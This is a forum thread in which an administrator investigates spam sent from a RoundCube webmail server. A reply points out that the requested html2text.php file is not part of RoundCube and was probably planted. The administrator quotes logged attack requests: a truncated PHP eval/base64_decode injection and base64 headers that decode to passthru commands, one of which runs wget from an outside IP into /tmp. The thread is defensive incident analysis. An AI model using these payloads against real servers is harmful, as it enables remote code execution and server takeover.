I installed 0.8.5 a few months ago to evaluate, but I don't actively use it. I have Apache httpd-2.2.3-63-el , php-5.1.6-39-el on RedHat 5.2, admittedly not the latest updates for EL which are 2.2.3-78 and .1.6-40.el5
I'm trying to track down some process that has managed to send a load of spam through my server - while I was away at a conference, of course.... I still haven't found a smoking gun, but sendmail has "apache set sender to
[email protected] using -f" and I found a few entries in Apache logs like:
POST /roundcube/bin/html2text.php
(although not nearly enough to account for all the spam logged by sendmail)
This isn't the previously patched vulnerability in user preferences - I don't have any active users, and there's no GETs in the logs, only these POSTs
I don't have full network logging, but there's curious looking stuff that I do have, viz.
POST /roundcube/bin/html2text.php
Accept: cGFzc3RocnUoImVjaG8gLW47Iik7Cg==\r\n
Data: <b>{${EVAL(BASE64_DECODE($_SE...
POST /roundcube/bin/html2text.php
Accept: cGFzc3RocnUoImVjaG8gLW47Y2QgL3RtcDsgd2dldCAxNzQuMTIxLjczLjE2Mi9pY....
Those HTTP Accept strings are base-64 encoded versions of:
passthru("echo -n;");
passthru("echo -n;cd /tmp; wget ....
which looks decidedly suspicious.
I'm not sure if this issue is with RoundCube, or PHP, or Apache, or some config entry I broke.
There is a problem with the path you posted "/roundcube/bin/html2text.php" there isn't and never has been a html2text.php file in RoundCube's bin folder. It has most likely been added by something malicious. I don't know of any vulnerability in RoundCube 0.8.x but it does require PHP 5.2.1 or greater so you may have opened up a hole within PHP.